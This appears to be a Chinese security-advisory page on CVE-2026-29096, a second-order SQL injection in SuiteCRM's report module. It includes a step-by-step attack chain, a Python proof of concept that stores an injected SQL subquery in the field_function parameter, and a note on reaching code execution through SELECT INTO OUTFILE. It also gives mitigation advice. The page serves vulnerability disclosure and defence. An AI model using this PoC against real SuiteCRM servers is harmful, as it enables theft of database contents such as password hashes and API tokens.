CVE-2026-29096 CVSS 8.1 高危

CVE-2026-29096 SuiteCRM二阶SQL注入漏洞

披露日期: 2026-03-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-29096

漏洞类型

SQL注入

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

SuiteCRM

漏洞概述

SuiteCRM在7.15.1和8.9.3之前的版本中存在二阶SQL注入漏洞。攻击者在创建或编辑报告时，通过`field_function`参数注入恶意SQL代码，该代码未经验证直接存入数据库。当报告被执行时，恶意代码被拼接进SQL查询，导致数据泄露或RCE。

技术细节

该漏洞位于AOR_Reports模块。当用户创建或编辑报告时，POST请求中的`field_function`参数未经过滤直接存储在`aor_fields`表中。后续查看或执行该报告时，系统将此值直接拼接到SQL SELECT语句中，造成二阶SQL注入。拥有报告访问权限的认证用户可利用此漏洞提取任意数据库内容（如密码哈希、API令牌）。若MySQL数据库具有FILE权限，还可通过`SELECT INTO OUTFILE`实现远程代码执行。

攻击链分析

STEP 1

步骤1

攻击者获取SuiteCRM的合法用户账号并登录。

STEP 2

步骤2

导航至AOR_Reports模块，创建或编辑一个新的报告。

STEP 3

步骤3

在报告字段配置中，向`field_function`参数注入恶意SQL语句（如UNION SELECT或子查询）。

STEP 4

步骤4

保存报告，恶意 payloads 被存储在数据库的`aor_fields`表中。

STEP 5

步骤5

执行或查看该报告，系统从数据库读取恶意值并拼接进SQL SELECT语句，触发注入并执行恶意命令。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-29096 (Second-order SQL Injection in SuiteCRM)
# Attacker injects SQL payload into the 'field_function' parameter when creating a report.

import requests

target_url = "http://vulnerable-suitecrm.com/index.php"
session = requests.Session()

# 1. Login
creds = {"user_name": "attacker", "user_password": "password"}
session.post(target_url + "/?module=Users&action=Login", data=creds)

# 2. Create Report with SQL Injection in field_function
# The payload attempts to extract the database user
payload = "(SELECT SUBSTRING(@@version, 1, 10))"

report_data = {
    "module": "AOR_Reports",
    "action": "save",
    "name": "ExploitReport",
    "report_module": "Accounts",
    "field_function[]": payload  # Vulnerable parameter
}

response = session.post(target_url, data=report_data)

if response.status_code == 200:
    print("Report created successfully. SQL payload stored.")
    print("Trigger the report execution to execute the SQL.")

影响范围

SuiteCRM < 7.15.1

SuiteCRM < 8.9.3

防御指南

临时缓解措施

建议立即升级至修复版本。若无法立即升级，应严格限制用户对AOR_Reports模块的访问权限，并撤销数据库用户的FILE特权以防止利用SQL注入写入Webshell。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表